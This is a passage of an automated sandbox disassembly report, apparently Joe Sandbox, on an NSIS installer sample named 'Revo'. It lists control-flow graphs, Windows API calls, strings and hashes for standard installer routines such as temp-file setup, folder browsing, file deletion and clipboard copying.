89->92 91->66 107 403a4e-403a64 call 4066a2 * 2 91->107 110 403ab4-403acc 92->110 111 403aa5-403aaf call 4066a2 92->111 95 403a26-403a2a 93->95 96 403a1f-403a24 93->96 95->93 101 403a2c 95->101 96->95 96->101 97->77 102 403c63-403c65 call 40140b 97->102 98->97 98->102 101->89 102->77 107->72 114 403ad1-403ad5 110->114 111->110 116 403ada-403b04 wsprintfW call 4066df 114->116 120 403b06-403b0b call 405bf6 116->120 121 403b0d call 405c50 116->121 124 403b12-403b14 120->124 121->124 126 403b50-403b6f SetCurrentDirectoryW call 406462 CopyFileW 124->126 127 403b16-403b20 GetFileAttributesW 124->127 135 403b71-403b92 call 406462 call 4066df call 405c85 126->135 136 403bae 126->136 128 403b41-403b4c 127->128 129 403b22-403b2b DeleteFileW 127->129 128->114 132 403b4e 128->132 129->128 131 403b2d-403b3f call 405dae 129->131 131->116 131->128 132->66 144 403b94-403b9e 135->144 145 403bd8-403be4 CloseHandle 135->145 136->66 144->136 146 403ba0-403ba8 call 4069ff 144->146 145->136 146->116 146->136
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32 ref: 00403688
                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
                                                                                                                                              • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004037A3
                                                                                                                                              • SHGetFileInfoW.SHELL32(00432708,00000000,?,000002B4,00000000), ref: 004037C2
                                                                                                                                              • GetCommandLineW.KERNEL32(00464260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
                                                                                                                                              • CharNextW.USER32(00000000,004BD000,00000020,004BD000,00000000,?,00000008,0000000A,0000000C), ref: 00403810
                                                                                                                                              • GetTempPathW.KERNEL32(00002000,004D1000,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004D1000,00001FFB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                                                                                                              • lstrcatW.KERNEL32(004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
                                                                                                                                              • GetTempPathW.KERNEL32(00001FFC,004D1000,004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
                                                                                                                                              • lstrcatW.KERNEL32(004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,004D1000,004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,004D1000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
                                                                                                                                              • DeleteFileW.KERNEL32(004CD000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
                                                                                                                                              • lstrlenW.KERNEL32(004D1000,004BD000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
                                                                                                                                                • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                              • wsprintfW.USER32 ref: 00403AE4
                                                                                                                                              • GetFileAttributesW.KERNEL32(00481000,004D1000), ref: 00403B17
                                                                                                                                              • DeleteFileW.KERNEL32(00481000), ref: 00403B23
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004D1000,004D1000), ref: 00403B51
                                                                                                                                                • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
                                                                                                                                              • CopyFileW.KERNEL32(004D9000,00481000,00000001,004D1000,00000000), ref: 00403B67
                                                                                                                                                • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(76F93420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 00406A0A
                                                                                                                                                • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                                                                                                              • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB0
                                                                                                                                              • CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403BD2
                                                                                                                                              • CloseHandle.KERNEL32(00000000,00485000,00485000,?,00481000,00000000), ref: 00403BD9
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403C7C
                                                                                                                                                • Part of subcall function 00405C50: CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                              • API String ID: 2017177436-2502969717
                                                                                                                                              • Opcode ID: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
                                                                                                                                              • Instruction ID: d5dd5e0f9c74a08960ebc8aa75e9a138e3a42fd8f19371cc0c5244fd25c86c9d
                                                                                                                                              • Opcode Fuzzy Hash: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
                                                                                                                                              • Instruction Fuzzy Hash: 56F108316043019AD720AF769D45B2B7AE8EF4174AF10883EF581B22D1DB7CDA45CB6E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 149 405866-405881 150 405a10-405a17 149->150 151 405887-40594e GetDlgItem * 3 call 404656 call 404faf GetClientRect GetSystemMetrics SendMessageW * 2 149->151 153 405a41-405a4e 150->153 154 405a19-405a3b GetDlgItem CreateThread CloseHandle 150->154 173 405950-40596a SendMessageW * 2 151->173 174 40596c-40596f 151->174 156 405a50-405a56 153->156 157 405a6c-405a76 153->157 154->153 161 405a91-405a9a call 404688 156->161 162 405a58-405a67 ShowWindow * 2 call 404656 156->162 158 405a78-405a7e 157->158 159 405acc-405ad0 157->159 163 405a80-405a8c call 4045fa 158->163 164 405aa6-405ab6 ShowWindow 158->164 159->161 167 405ad2-405ad8 159->167 170 405a9f-405aa3 161->170 162->157 163->161 171 405ac6-405ac7 call 4045fa 164->171 172 405ab8-405ac1 call 405727 164->172 167->161 175 405ada-405aed SendMessageW 167->175 171->159 172->171 173->174 178 405971-40597d SendMessageW 174->178 179 40597f-405996 call 404621 174->179 180 405af3-405b1e CreatePopupMenu call 4066df AppendMenuW 175->180 181 405bef-405bf1 175->181 178->179 188 405998-4059ac ShowWindow 179->188 189 4059cc-4059ed GetDlgItem SendMessageW 179->189 186 405b20-405b30 GetWindowRect 180->186 187 405b33-405b48 TrackPopupMenu 180->187 181->170 186->187 187->181 190 405b4e-405b65 187->190 191 4059bb 188->191 192 4059ae-4059b9 ShowWindow 188->192 189->181 193 4059f3-405a0b SendMessageW * 2 189->193 194 405b6a-405b85 SendMessageW 190->194 195 4059c1-4059c7 call 404656 191->195 192->195 193->181 194->194 196 405b87-405baa OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 194->196 195->189 198 405bac-405bd3 SendMessageW 196->198 198->198 199 405bd5-405be9 GlobalUnlock SetClipboardData CloseClipboard 198->199 199->181
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004058C4
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004058D3
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405910
                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405917
                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                                                                                                                • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405A5F
                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405A64
                                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405AAE
                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                                                                                                              • CreatePopupMenu.USER32 ref: 00405AF3
                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405B27
                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405B88
                                                                                                                                              • EmptyClipboard.USER32 ref: 00405B8E
                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                                                                                                              • CloseClipboard.USER32 ref: 00405BE9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                              • String ID: H'D${
                                                                                                                                              • API String ID: 590372296-3538427676
                                                                                                                                              • Opcode ID: 7fb9c064395b8d5c06d15c7ce8b1b0c6621f3944dcd12c6d8502cf874e2b8e07
                                                                                                                                              • Instruction ID: a946544cda80648ae215d749a1304cfc675a42e6d6c1d5f97ef9608d1157b9e3
                                                                                                                                              • Opcode Fuzzy Hash: 7fb9c064395b8d5c06d15c7ce8b1b0c6621f3944dcd12c6d8502cf874e2b8e07
                                                                                                                                              • Instruction Fuzzy Hash: 0DB16770800608FFDF11AFA0DD859AE3B78EB48354F10413AFA45BA1A0D7785A41DF69

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 381 404b12-404b3c 382 404b3e-404b4a call 405ce6 call 406950 381->382 383 404b4f-404b59 381->383 382->383 385 404bc7-404bce 383->385 386 404b5b-404b71 GetDlgItem call 405fe8 383->386 389 404bd4-404bdd 385->389 390 404ca5-404cac 385->390 397 404b83-404bbc SetWindowTextW call 404621 * 2 call 404656 call 406a96 386->397 398 404b73-404b7b call 40601c 386->398 393 404bf7-404bfc 389->393 394 404bdf-404bea 389->394 395 404cbb-404cd6 call 405ce6 call 406079 390->395 396 404cae-404cb5 390->396 393->390 401 404c02-404c44 call 4066df SHBrowseForFolderW 393->401 399 404bf0 394->399 400 404e53-404e65 call 404688 394->400 419 404cd8 395->419 420 404cdf-404cf7 call 4066a2 call 406a96 395->420 396->395 396->400 397->400 439 404bc2-404bc5 SHAutoComplete 397->439 398->397 417 404b7d-404b7e call 405f71 398->417 399->393 413 404c46-404c60 CoTaskMemFree call 405f71 401->413 414 404c9e 401->414 426 404c62-404c68 413->426 427 404c8a-404c9c SetDlgItemTextW 413->427 414->390 417->397 419->420 437 404d33-404d44 call 4066a2 call 40601c 420->437 438 404cf9-404cff 420->438 426->427 430 404c6a-404c81 call 4066df lstrcmpiW 426->430 427->390 430->427 441 404c83-404c85 lstrcatW 430->441 453 404d46 437->453 454 404d49-404d62 GetDiskFreeSpaceW 437->454 438->437 442 404d01-404d13 GetDiskFreeSpaceExW 438->442 439->385 441->427 444 404d15-404d17 442->444 445 404d8b-404da5 442->445 448 404d19 444->448 449 404d1c-404d31 call 405fbd 444->449 447 404da7 445->447 451 404dac-404db6 call 404faf 447->451 448->449 449->437 449->442 459 404dd1-404dda 451->459 460 404db8-404dbf 451->460 453->454 454->447 457 404d64-404d89 MulDiv 454->457 457->451 461 404e0c-404e16 459->461 462 404ddc-404dec call 404f97 459->462 460->459 463 404dc1 460->463 465 404e22-404e28 461->465 466 404e18-404e1f call 40140b 461->466 473 404dfe-404e07 SetDlgItemTextW 462->473 474 404dee-404df7 call 404ece 462->474 467 404dc3-404dc8 463->467 468 404dca 463->468 471 404e2a 465->471 472 404e2d-404e3e call 404643 465->472 466->465 467->459 467->468 468->459 471->472 479 404e40-404e46 472->479 480 404e4d 472->480 473->461 481 404dfc 474->481 479->480 482 404e48 call 404a6b 479->482 480->400 481->461 482->480
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404B61
                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404B8B
                                                                                                                                              • SHAutoComplete.SHLWAPI(00000000,00000001,00000009,00000000,?,00000014,?,?,00000001,?), ref: 00404BC5
                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404C47
                                                                                                                                              • lstrcmpiW.KERNEL32(Remove folder: ,00442748,00000000,?,?), ref: 00404C79
                                                                                                                                              • lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404C85
                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
                                                                                                                                                • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00002000,00404CCE), ref: 00405CF9
                                                                                                                                                • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                                                                                                                • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                                                                                                                • Part of subcall function 00406950: CharNextW.USER32(?,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                                                                                                                • Part of subcall function 00406950: CharPrevW.USER32(?,?,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(C:\Program Files\,?,?,?,00000001,C:\Program Files\,?,?,000003FB,?), ref: 00404D0E
                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(C:\Program Files\,?,?,0000040F,?,C:\Program Files\,C:\Program Files\,?,00000001,C:\Program Files\,?,?,000003FB,?), ref: 00404D5A
                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
                                                                                                                                                • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                                                                                                                • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
                                                                                                                                                • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                              • String ID: A$C:\Program Files\$H'D$Remove folder:
                                                                                                                                              • API String ID: 4039761011-425954661
                                                                                                                                              • Opcode ID: 6e15f0ff5402f2575495af3f7f30cd26abeab5420aa242f492b7e6411a88d81d
                                                                                                                                              • Instruction ID: 631ab75ceab9e691d6259a87645379c0ec27aba7f5179a8718d2cd07d5d9f082
                                                                                                                                              • Opcode Fuzzy Hash: 6e15f0ff5402f2575495af3f7f30cd26abeab5420aa242f492b7e6411a88d81d
                                                                                                                                              • Instruction Fuzzy Hash: 52A1A3B1900209ABDB11AFA5CD81AEF77B8FF84754F11843BF601B62D1DB7C89418B69

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 616 405dae-405dd4 call 406079 619 405dd6-405de8 DeleteFileW 616->619 620 405ded-405df4 616->620 621 405f6a-405f6e 619->621 622 405df6-405df8 620->622 623 405e07-405e17 call 4066a2 620->623 625 405f18-405f1d 622->625 626 405dfe-405e01 622->626 629 405e26-405e27 call 405fbd 623->629 630 405e19-405e24 lstrcatW 623->630 625->621 628 405f1f-405f22 625->628 626->623 626->625 631 405f24-405f2a 628->631 632 405f2c-405f34 call 4069ff 628->632 633 405e2c-405e30 629->633 630->633 631->621 632->621 640 405f36-405f4a call 405f71 call 405d66 632->640 636 405e32-405e3a 633->636 637 405e3c-405e42 lstrcatW 633->637 636->637 639 405e47-405e63 lstrlenW FindFirstFileW 636->639 637->639 641 405e69-405e71 639->641 642 405f0d-405f11 639->642 656 405f62-405f65 call 405727 640->656 657 405f4c-405f4f 640->657 645 405e91-405ea5 call 4066a2 641->645 646 405e73-405e7b 641->646 642->625 644 405f13 642->644 644->625 658 405ea7-405eaf 645->658 659 405ebc-405ec7 call 405d66 645->659 648 405ef0-405f00 FindNextFileW 646->648 649 405e7d-405e85 646->649 648->641 653 405f06-405f07 FindClose 648->653 649->645 654 405e87-405e8f 649->654 653->642 654->645 654->648 656->621 657->631 660 405f51-405f60 call 405727 call 406462 657->660 658->648 661 405eb1-405eba call 405dae 658->661 669 405ee8-405eeb call 405727 659->669 670 405ec9-405ecc 659->670 660->621 661->648 669->648 673 405ee0-405ee6 670->673 674 405ece-405ede call 405727 call 406462 670->674 673->648 674->648
                                                                                                                                              APIs
                                                                                                                                              • DeleteFileW.KERNEL32(?,?,76F93420,76F92EE0,004BD000), ref: 00405DD7
                                                                                                                                              • lstrcatW.KERNEL32(00452750,\*.*,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E1F
                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E42
                                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E48
                                                                                                                                              • FindFirstFileW.KERNEL32(00452750,?,?,?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E58
                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405F07
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                              • String ID: P'E$\*.*
                                                                                                                                              • API String ID: 2035342205-897026672
                                                                                                                                              • Opcode ID: a3f270a56088b8bf3b652a13f4333b5ab17183d1fc399bf265a2fc2ef0cf4556
                                                                                                                                              • Instruction ID: d3f7042800757c758c726763e218659af4e34a2018f279a2393577cf1f32b1c8
                                                                                                                                              • Opcode Fuzzy Hash: a3f270a56088b8bf3b652a13f4333b5ab17183d1fc399bf265a2fc2ef0cf4556
                                                                                                                                              • Instruction Fuzzy Hash: 5741D130800A05E6CB21AB61CD89ABF7678EF45755F14413FF881B11D1DB7C8A82DEAE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                                                                                                              • Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
                                                                                                                                              • Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                                                                                                              • Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNEL32(76F93420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 00406A0A
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406A16
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
